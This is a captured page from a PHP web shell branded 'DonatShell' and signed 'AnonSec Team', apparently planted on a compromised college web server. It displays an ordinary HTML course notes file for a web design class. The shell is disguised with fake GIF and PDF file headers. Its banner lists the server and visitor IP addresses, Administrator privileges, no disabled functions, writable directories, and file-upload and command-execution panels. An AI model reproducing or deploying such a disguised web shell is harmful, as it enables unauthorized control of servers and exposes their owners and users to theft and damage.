GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1021/Labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1021/Labs//LabNotes.phpinc
<fieldset id="notes"><legend>Notes:</legend>
	<div>
		<b>We will be using the following foundation tags in every html page throughout this class:</b>
		<ol>
			<li>The HTML 5 DOCTYPE: <span class="highEL copyText" id="spanDOCTYPE">&lt;!DOCTYPE html&gt;</span>.</li>
			<li>An html tag with the <span class="highATT">lang</span>  attribute set to <span class="highVAL">en</span>: <span class="highEL copyText">&lt;html <span class="highATT">lang="<span class="highVAL">en</span>"</span>&gt;</span>.</li>
			<li>A <span class="highELE">head</span> section containing:
				<ol style="list-style-type: lower-roman">
					<li>A <span class="highELE">title</span> tag with the title directed above: <span class="copyText"><span class="highEL">&lt;title&gt;</span><span class="highINH">replace_with_title_above</span><span class="highEL">&lt;/title&gt;</span></span>.</li>
					<li>The meta character set tag <span class="highEL copyText">&lt;meta <span class="highATT">charset="<span class="highVAL">utf-8</span>"</span>&gt;</span>.</li>
					<li>A <span class="highELE">link</span> tag to the <span class="highVAL"><?=$evaluationName?>.css</span> file: <span class="highEL copyText">&lt;link <span class="highATT">href="<span class="highVAL"><?=$evaluationName?>.css</span>"</span> <span class="highATT">rel="<span class="highVAL">stylesheet</span>"</span>&gt;</span></li>
				</ol>
			</li>
			<li>A <span class="highELE">body</span> section containing:
				<ol>
					<li>An <span class="highELE">h1</span> heading as the first element in the body with content the same as the title above.</li>
					<li>The rest of your html code... <span class="note">Except for any needed internal <span class="highELE">style</span> elements, which would go in the head section.</span></li>
				</ol>
			</li>
		</ol>
	</div>
	<div class="hp">
		The <b>HTML</b> in the instructions is color coded to make it easier for you to understand:
		<ul>
			<li>Elements (tags) are color coded like <span class="highELE">tag</span>.</li>
			<li>Tag attributes are color coded like <span class="highATT">attribute</span>.</li>
			<li>Attribute values are color coded like <span class="highVAL">value</span>.</li>
			<li>The innerHtml (content) for elements (tags) are color coded like <span-content>innerHtml</span-content>.</li>
		</ul>
		The <b>CSS</b> in the instructions is color coded to make it easier for you to understand:
		<ul>
			<li>CSS selectors are color coded like <span class="highCSS">selector</span>.</li>
			<li>CSS properties are color coded like <span class="highCSP">property</span>.</li>
			<li>CSS property values are color coded like <span class="highCSV">value</span>.</li>
		</ul>
	</div>
	<div class="hp">
		Further, instructions for CSS and HTML have a background color:
		<ul>
			<li>
			For the first or only page:
				<ul>
					<li class="css">CSS instuctions have this background color.</li>
					<li class="page">HTML instuctions have this background color.</li>
				</ul>
			</li>
			<li>
			For a second page:
				<ul>
					<li class="cssB">CSS instuctions have this background color.</li>
					<li class="pageB">HTML instuctions have this background color.</li>
				</ul>
			</li>
		</ul>
	</div>
</fieldset>

Anon7 - 2022
AnonSec Team